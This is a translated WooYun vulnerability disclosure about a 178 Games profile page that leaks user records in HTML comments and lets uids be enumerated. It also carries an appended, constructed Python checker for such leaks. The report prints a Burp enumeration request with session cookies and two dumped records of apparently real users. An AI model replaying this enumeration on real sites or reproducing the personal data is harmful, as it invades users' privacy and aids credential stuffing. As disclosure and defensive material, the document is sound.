2015-08-08: Details reported to the vendor, awaiting vendor handling
2015-08-10: Vendor confirmed; details visible to the vendor only
2015-08-20: Details disclosed to core white hats and relevant domain experts
2015-08-30: Details disclosed to ordinary white hats
2015-09-09: Details disclosed to intern white hats
2015-09-24: Details disclosed to the public
Sensitive information disclosure on an important 178 Games site
WooYun is a very good platform for learning. Today, while browsing the report WooYun: 178游戏重要站点SQL注射之官渡之战 (SQL injection on an important 178 Games site), I poked at the site myself and found an information disclosure. The leaked information includes id, username, gender, birthday (age), zodiac sign, email, real name, QQ number, address, phone number and other private data. The leaked data sits inside a commented-out block of code and is only visible when viewing the page source. For example:
<!-- array(36) { ["id"]=> string(8) "36791303" ["username"]=> string(8) "qq981021" ["gender"]=> NULL ["birthday"]=> string(10) "1998-11-20" ["astro"]=> string(9) "天蝎座" ["resident"]=> NULL ["email"]=> string(17) "[email protected]" ["realname"]=> NULL ["qq"]=> NULL ["msn"]=> NULL ["cellphone"]=> NULL ["comefrom"]=> NULL ["gender_flag"]=> string(1) "1" ["r_province"]=> string(18) "内蒙古自治区" ["r_city"]=> string(9) "通辽市" ["r_district"]=> string(9) "奈曼旗" ["h_province"]=> string(18) "内蒙古自治区" ["h_city"]=> string(9) "通辽市" ["h_district"]=> string(9) "奈曼旗" ["bloodtype"]=> string(1) "3" ["marriage"]=> string(1) "1" ["customer"]=> NULL ["privacy"]=> string(250) "a:9:{s:5:"index";s:1:"0";s:4:"blog";s:1:"0";s:5:"album";s:1:"0";s:8:"comments";s:1:"0";s:4:"poll";s:1:"1";s:6:"search";s:1:"1";s:9:"footprint";s:1:"1";s:7:"friends";s:1:"1";s:3:"sms";a:5:{i:0;s:1:"1";i:1;s:1:"2";i:2;s:1:"3";i:3;s:1:"4";i:4;s:1:"5";}}" ["allow_search"]=> string(1) "1" ["srank"]=> array(2) { ["srank"]=> array(6) { ["bloodtype"]=> string(1) "1" ["marriage"]=> string(1) "1" ["birthday"]=> string(1) "0" ["astro"]=> string(1) "1" ["resident"]=> string(1) "0" ["home"]=> string(1) "1" } ["index"]=> array(7) { ["gender"]=> string(1) "1" ["bloodtype"]=> string(1) "1" ["marriage"]=> string(1) "1" ["birthday"]=> string(1) "1" ["astro"]=> string(1) "1" ["resident"]=> string(1) "1" ["home"]=> string(1) "1" } } ["notify"]=> NULL ["status"]=> string(1) "0" ["is_check"]=> string(1) "0" ["update_time"]=> string(1) "0" ["create_time"]=> string(1) "0" ["acc_email"]=> string(17) "[email protected]" ["acc_id"]=> string(8) "36791303" ["uid"]=> string(8) "36791303" ["acc_username"]=> string(8) "qq981021" ["acc_nickname"]=> string(8) "qq981021" ["nickname"]=> string(8) "qq981021"}-->
Root cause:
The uid can be enumerated: http://i.178.com/?uid=36791303 directly displays another registered user's information, and viewing the source of that page shows the leak.
For example, the URL:
http://i.178.com/?uid=36792945
I just tested it briefly and ran some uids through Burp:
GET /?uid=§36790000§ HTTP/1.1
Host: i.178.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _sid=46c23308cb0a98eab7e28be44c160709850008dd; _i=MyGjU0IJ9mk4gWh2UN145kkC8v82F6exNBdg%2BH4WcpjEufjFwzNwzg%3D%3D_bc62bd0a7e57b2536b39a3b54ee44046_1439008048; _l=1439007836; _178c=36809261%23%23testxxxx; _e=31536000; __utma=156161507.1140119810.1439007847.1439007847.1439007847.1; __utmb=156161507.4.10.1439007847; __utmc=156161507; __utmz=156161507.1439007847.1.1.utmcsr=account.178.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmt=1; CNZZDATA30044938=cnzz_eid%3D580410582-1439005044-http%253A%252F%252Faccount.178.com%252F%26ntime%3D1439005044
Connection: keep-alive
If-Modified-Since: Sat, 08 Aug 2015 04:27:27 GMT
uids from 36790000 to 36809260, as shown in the figure:
Impact:
Since logging in to 178 only requires knowing a username or email address, the accounts can be subjected to credential stuffing, username harvesting, and so on.
http://i.178.com/?uid=36791190
Leak location:
<!-- array(36) { ["id"]=> string(8) "36791190" ["username"]=> string(15) "兰迪。奥顿" ["gender"]=> NULL ["birthday"]=> string(10) "1982-09-17" ["astro"]=> string(9) "处女座" ["resident"]=> NULL ["email"]=> string(17) "[email protected]" ["realname"]=> NULL ["qq"]=> NULL ["msn"]=> NULL ["cellphone"]=> NULL ["comefrom"]=> NULL ["gender_flag"]=> string(1) "1" ["r_province"]=> string(9) "四川省" ["r_city"]=> string(6) "遂宁" ["r_district"]=> string(9) "大英县" ["h_province"]=> string(9) "河南省" ["h_city"]=> string(9) "周口市" ["h_district"]=> string(9) "扶沟县" ["bloodtype"]=> string(1) "4" ["marriage"]=> string(1) "1" ["customer"]=> NULL ["privacy"]=> NULL ["allow_search"]=> string(1) "1" ["srank"]=> array(2) { ["srank"]=> array(6) { ["bloodtype"]=> string(1) "0" ["marriage"]=> string(1) "3" ["birthday"]=> string(1) "3" ["astro"]=> string(1) "3" ["resident"]=> string(1) "3" ["home"]=> string(1) "3" } ["index"]=> array(7) { ["gender"]=> string(1) "1" ["bloodtype"]=> string(1) "1" ["marriage"]=> string(1) "1" ["birthday"]=> string(1) "1" ["astro"]=> string(1) "1" ["resident"]=> string(1) "1" ["home"]=> string(1) "1" } } ["notify"]=> NULL ["status"]=> string(1) "0" ["is_check"]=> string(1) "0" ["update_time"]=> string(1) "0" ["create_time"]=> string(1) "0" ["acc_email"]=> string(17) "[email protected]" ["acc_id"]=> string(8) "36791190" ["uid"]=> string(8) "36791190" ["acc_username"]=> string(15) "兰迪。奥顿" ["acc_nickname"]=> string(15) "兰迪。奥顿" ["nickname"]=> string(15) "兰迪。奥顿"}-->
Fix: remove the code inside the comment.
Severity: Medium
Vulnerability Rank: 7
Confirmation time: 2015-08-10 13:08
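As an added example (not code from the report or the vendor), a check a defender can run over their own rendered pages to catch exactly this class of leak: it parses PHP var_dump() output left inside HTML comments, reading strings by their declared string(N) byte length so that serialized values containing quotes (like the "privacy" field above) parse intact, and reports which PII fields are populated. The sample page, the PII_KEYS list and the function names are constructed for this example.

```python
import re

# Constructed sample page: a var_dump() of a user record left inside an HTML
# comment, in the shape the report shows (keys trimmed, values made up).
SAMPLE_HTML = '''<html><body><p>profile</p>
<!-- array(7) { ["id"]=> string(8) "10000001" ["username"]=> string(8) "demo_usr" ["birthday"]=> string(10) "1990-01-01" ["astro"]=> string(9) "天蝎座" ["realname"]=> NULL ["privacy"]=> string(26) "a:1:{s:5:"index";s:1:"0";}" ["srank"]=> array(1) { ["birthday"]=> string(1) "0" } }-->
</body></html>'''.encode('utf-8')

TOKEN = re.compile(rb'\s*(?:(array)\((\d+)\)\s*\{|(string)\((\d+)\)\s*"|NULL)')
KEY = re.compile(rb'\s*\[(?:"([^"]*)"|(-?\d+))\]=>')
CLOSE = re.compile(rb'\s*\}')
PII_KEYS = {'username', 'email', 'acc_email', 'realname', 'qq', 'cellphone', 'birthday'}

def parse_value(d: bytes, i: int = 0):
    """Parse one var_dump() value (array/string/NULL subset) starting at byte
    offset i of d; returns (value, offset just past it)."""
    m = TOKEN.match(d, i)
    if not m:
        raise ValueError(f'unrecognised token at offset {i}')
    i = m.end()
    if m.group(3):   # string(N) "...": take exactly N bytes, so embedded quotes
        n = int(m.group(4))   # (as in the serialized "privacy" value) are fine
        if d[i + n:i + n + 1] != b'"':
            raise ValueError(f'string length mismatch at offset {i}')
        return d[i:i + n].decode('utf-8', 'replace'), i + n + 1
    if m.group(1):                              # array(N) { key=> value ... }
        out = {}
        for _ in range(int(m.group(2))):
            k = KEY.match(d, i)
            if not k:
                raise ValueError(f'bad key at offset {i}')
            key = k.group(1).decode('utf-8') if k.group(1) is not None else int(k.group(2))
            out[key], i = parse_value(d, k.end())
        c = CLOSE.match(d, i)
        if not c:
            raise ValueError(f'expected }} at offset {i}')
        return out, c.end()
    return None, i                              # NULL

def find_leaked_pii(html: bytes) -> dict:
    """PII fields with non-NULL values in any var_dump() array left inside an HTML comment."""
    leaked = {}
    for m in re.finditer(rb'<!--(.*?)-->', html, re.S):
        body = m.group(1).strip()
        if body.startswith(b'array('):
            record, _ = parse_value(body)
            leaked.update({k: v for k, v in record.items()
                           if k in PII_KEYS and v is not None})
    return leaked
```

Running find_leaked_pii over the sample page reports the populated username and birthday; realname is NULL and so is not reported.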
Thanks to the reporter for their attention to Perfect World; we will patch this vulnerability as soon as possible.
None yet.